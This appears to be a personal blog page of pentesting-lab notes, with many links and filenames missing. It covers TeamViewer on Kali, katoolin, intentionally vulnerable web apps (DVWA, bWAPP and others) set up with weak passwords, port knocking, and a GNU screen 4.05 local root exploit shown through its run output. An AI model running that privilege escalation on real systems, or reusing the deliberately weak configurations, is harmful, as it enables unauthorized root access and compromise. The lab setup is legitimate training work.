TeamViewer installation on Kali

-install sddm as default X windows because default X windows in Kali didn’t allow remote TeamViewer without login GUI first

# apt-get install sddm

# dpkg –add-architecture i386
# apt-get update
# dpkg -i –force-depends teamviewer_i386.deb
# apt-get install -f

# teamviewer –daemon start

-get current TeamViewer id either from GUI or CLI
# teamviewer –info print version, status, id
 TeamViewer                           12.0.71510  (DEB)
 teamviewerd status                   ● teamviewerd.service – TeamViewer remote control daemon
   Loaded: loaded (/etc/systemd/system/teamviewerd.service; enabled; vendor preset: disabled)
   Active: active (running) since Sun 2017-03-19 09:02:02 PDT; 9min ago
  Process: 1140 ExecStart=/opt/teamviewer/tv_bin/teamviewerd -d (code=exited, status=0/SUCCESS)
 Main PID: 1162 (teamviewerd)
    Tasks: 12 (limit: 4915)
   CGroup: /system.slice/teamviewerd.service
           └─1162 /opt/teamviewer/tv_bin/teamviewerd -d
Mar 19 09:02:00 kali2 systemd[1]: Starting TeamViewer remote control daemon…
Mar 19 09:02:02 kali2 systemd[1]: Started TeamViewer remote control daemon.

 TeamViewer ID:                        798024234

-run teamviewer gui
# teamviewer
click Connection/Setup Unattended Access
click Next

click Finish

Now you can remotely connect to your Linux TeamViewer
-every time you adding device or login to new device while login to your TeamViewer a/c. TeamViewer will ask your permission by sending an email with title “Device authorization needed”
Just click a link in that email to add your device into your TV a/c

MichaCry an Automatic Pentesting Tools

# cd /root
# apt-get install figlet -y
# cd MichaCry
# chmod +x
# vi
change this part
# vi


# ./
# ./

20170304 17.15.jpg

screen root privillege escalation

-this exploit will make normal user become root
-tried working with Ubuntu 13.x with old patches but not with Debian 8 or Parrot with latest patches

If you don’t have screen 4.05 then you need to install or compile yourself
# apt-get install screen
# cd /root
# cd screen-4.5.0
# apt-get install libncurses5-dev
# ./configure;make;make install

# screen -v
Screen version 4.05.00 (GNU) 10-Dec-16

# su – user1
$ ./
~ gnu/screenroot ~
[+] First, we create our shell and library…
[+] Now we create our /etc/ file…
[+] Triggering…
‘ from /etc/ cannot be preloaded: ignored.
[+] done!
No Sockets found in /tmp/screens/S-user1.

# whoami

Installing FireFox on Debian

# echo “deb jessie-backports firefox-release” >> /etc/apt/sources.list.d/mozilla-firefox.list
# cat /etc/apt/preferences.d/mozilla-firefox
Package: *
Pin: origin
Pin-Priority: 501

# apt-get update
# apt-cache policy firefox
  Installed: 51.0.1-3
  Candidate: 51.0.1-3
  Version table:
 *** 51.0.1-3 1001
       1001 stable/main amd64 Packages
        100 /var/lib/dpkg/status
     51.0.1-3~bpo80+1 501
        501 jessie-backports/firefox-release amd64 Packages

# apt-get install firefox -y

Installing Kali tool on Debian

We need katoolin for that purpose

# cd /root
# cd katoolin
# ln -s katoolin
# chmod +x katoolin
# ./katoolin
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 2

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> back

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 2

1) Information Gathering                        8) Exploitation Tools
2) Vulnerability Analysis                       9) Forensics Tools
3) Wireless Attacks                             10) Stress Testing
4) Web Applications                             11) Password Attacks
5) Sniffing & Spoofing                          12) Reverse Engineering
6) Maintaining Access                           13) Hardware Hacking
7) Reporting Tools                              14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
kat > 0
Do you want to continue? [Y/n]

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
Do you want to install classicmenu indicator ? [y/n]> y

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 4
Do you want to install Kali menu ? [y/n]> y

Installing Vulnerable bWAPP, DVWA, Joomla, Mutillidae2, SQLi-Labs, XAMPP, WordPress on TurnKey LAMP

Download and install TurnKey LAMP ova from
set VBox Settings/Display/Screen/Video Memory to 6MB
set NIC1 to Bridge in VBox
Set NIC2 to Host only
click Advanced Menu
select Networking, click Select
Set eth0 to dhcp and eth1 to static


# cd /root
# apt list –installed
find apache and mysql packages name there
# service mysql stop
# apt-get purge mysql-server mysql-client mysql-common
# apache2ctl stop
# apt-get purge apache2 apache2-utils apache2.2-bin
# apt-get autoremove

# apt-get autoclean

-download xampp
# chmod 755
# ./
Welcome to the XAMPP Setup Wizard.
Select the components you want to install; clear the components you do not want
to install. Click Next when you are ready to continue.
   XAMPP Core Files : Y (Cannot be edited)
   XAMPP Developer Files [Y/n] :
   Is the selection above correct? [Y/n]:
Installation Directory
   XAMPP will be installed to /opt/lampp
   Press [Enter] to continue:
Setup is now ready to begin installing XAMPP on your computer.

   Do you want to continue? [Y/n]:

# cd /opt/lampp
# sed -i s/’local’/’all granted’/ etc/extra/httpd-xampp.conf
# lampp start
-to restart apache only
# /opt/lampp/bin/apachectl restart

-apache docs location on /opt/lampp/htdocs

bWAPP (Buggy Web Application)
# cd /root
# mkdir -p /opt/lampp/htdocs/bwapp
# mv download?source=files bwapp/ /opt/lampp/htdocs/bwapp/
# cd /opt/lampp/htdocs/bwapp
# unzip
# rm
# vi bWAPP/admin/settings.php
set this part

$db_password = “”;

# cd bWAPP
# chmod 777 documents images passwords
-open your browser and go to
click on here
L: bee
P: bug


-download dvwa
# cd /root
# mv DVWA /opt/lampp/htdocs/dvwa
# cd /opt/lampp/htdocs/dvwa
# chmod 766 hackable/uploads
# chown root:root hackable/uploads
# chmod 766 external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
with your gmail account
click Continue
click Get reCAPTCHA
on Label and Domains type your domain i.e:
click Register
You will get Site and Secret key
# cd /opt/lampp/htdocs/dvwa/config
# cp -p
# vi
-set your mysql root password
$_DVWA[ ‘db_password’ ] = ‘Passw0rd’;
-insert Site > public key and Secret > private key into this part
$_DVWA[ ‘recaptcha_public_key’ ]  = ‘6LdaMRYUAAAAAGH_Wjgn15xUmdcXTMP9YpBJ7y3n1’;

$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdaMRYUAAAAALsTFuYgrGbeozX2efE3EOz11T5x1’;

Set “allow_url_include = On”
# sed -i s/’allow_url_include=Off’/’allow_url_include=On’/ /opt/lampp/etc/php.ini
# /opt/lampp/bin/apachectl restart
go to
click Create/Reset Database
go to
L: admin

P: password

# cd /root
# mv joomla_3-6-5-stable-full_package-zip\?format\=zip
# unzip -d joomla
# mv joomla /opt/lampp/htdocs
# cd /opt/lampp
# sed -i s/’display_errors=On’/’display_errors=Off’/ etc/php.ini
# sed -i s/’output_buffering=4096’/’output_buffering=Off’/ etc/php.ini
# cd /opt/lampp/htdocs/joomla/
# cp installation/model/configuration.php .
# chmod 777 configuration.php
# /opt/lampp/bin/apachectl restart
go to
Select Langunage: English (United States)
Site Name: joomla
Site Offline: Yes
Administrator Email:
Administrator Username: root
Administrator Password:
Confirm Administrator Password:
click Next
Database Type: MySQLi
Host Name: localhost
Username: root
Database Name: joomla
Table Prefix: j00mla_
Old Database Process: Backup
click Next
click Next
Install Sample Data: Learn Joomla English (GB) Sample Data
Email Configuration: No
click Install
click Remove installation folder
if you got error
# cd /opt/lampp/htdocs/joomla
# rm -rf installation
# chmod 644 configuration.php
go to
L: root


NOWASP Mutillidae 2
# cd /root
# apt-get install software-properties-common python-software-properties php5-curl -y
# mv download\?source\=files
# unzip
# mv mutillidae /opt/lampp/htdocs/
# cd /opt/lampp/htdocs/mutillidae
# vi classes/MySQLHandler.php
set your MySQL password here
        static public $mMySQLDatabasePassword = “”;
-only allow access from your network
# vi .htaccess
Allow from
# /opt/lampp/bin/apachectl restart
go to
click setup/reset the DB
click OK


# cd /root
# unzip
# mv sqli-labs-master /opt/lampp/htdocs/sqli
# cd /opt/lampp/htdocs/sqli
# vi sql-connections/
set mysql password i.e.
$dbpass =”;
open browser and go to
click Setup/reset Database for labs


-because TurnKey LAMPP doesn’t have required gcc for compiling pcre lib, we need to do this in other Ubuntu server.
After compiling then copy the lib into TurnKey LAMPP
download pcre
# cd /root
# tar xf pcre-8.40.tar
# cd /pcre-8.40
# ./configure –prefix=/tmp –enable-utf8 –enable-unicode-properties ; make ; make install
# cd /tmp
# tar cf lib.tar lib

# scp lib.tar root@

-copy lib into /opt/lampp/lib
# cd /opt/lampp/lib
# cp /tmp/lib/* .

-create empty wordpress db
go to
click New on top left
Create database: wordpress

click Create

# mv WordPress /opt/lampp/htdocs/
# cd /opt/lampp/htdocs
# mv WordPress wordpress
# cd /opt/lampp/htdocs/wordpress
go to

click Let’s go!

Database Name: wordpress
Username: root
Password: Passw0rd
Database Host: localhost
Table Prefix: wp_
click Submit
You will get warning “Sorry, but I can’t write the wp-config.php file”.
Paste the content shown into wp-config.php
# vi wp-config.php

click  “Run the install”

Information needed
Site Title: wordpress
Username: root
Password: Passw0rd
Your Email:
Search Engine Visibility:
click Install WordPress

-you can go to for admin purposes

Create xampp startup script
# cat /etc/init.d/lampp
#! /bin/sh
# Provides:             xampp
# Required-Start:       $remote_fs $syslog
# Required-Stop:        $remote_fs $syslog
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description: Execute the xampp command.
# Description:
case “$1” in
        /opt/lampp/lampp start
        /opt/lampp/lampp restart
        /opt/lampp/lampp stop
        /opt/lampp/lampp status
        echo “Usage: $0 start|stop|restart|status”

# chmod 755 /etc/init.d/lampp
# insserv -d /etc/init.d/lampp
# systemctl enable lampp

Port Knocking

BY using port knocking, we can open or close the port if we know the knock order

VM: KALI2 (Server) KALI2 (Client)

KALI2 (Server)
# apt-get install knockd -y
# cat /etc/default/knockd

# cat /etc/knockd.conf
#change eth1 accordingly
sequence = 7000,8000,9000
seq_timeout = 5
command = /sbin/iptables -I INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn
sequence = 9000,8000,7000
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn

# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m conntrack –ctstate ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp –dport 22 -j REJECT
# iptables -S
# mkdir /etc/iptables
# iptables-save > /etc/iptables/rules.v4
# iptables-restore < /etc/iptables/rules.v4
-if using ip6
# ip6tables-save > /etc/iptables/rules.v6
# ip6tables-restore < /etc/iptables/rules.v6
# service knockd start

KALI2 (Client)
-nmap shown ssh port filtered
# nmap
22/tcp filtered ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds

# apt-get install knockd -y
# ssh root@
connection refused
# knock 7000 8000 9000
# ssh root@
connection successful
# knock 9000 8000 7000
# ssh root@
connection refused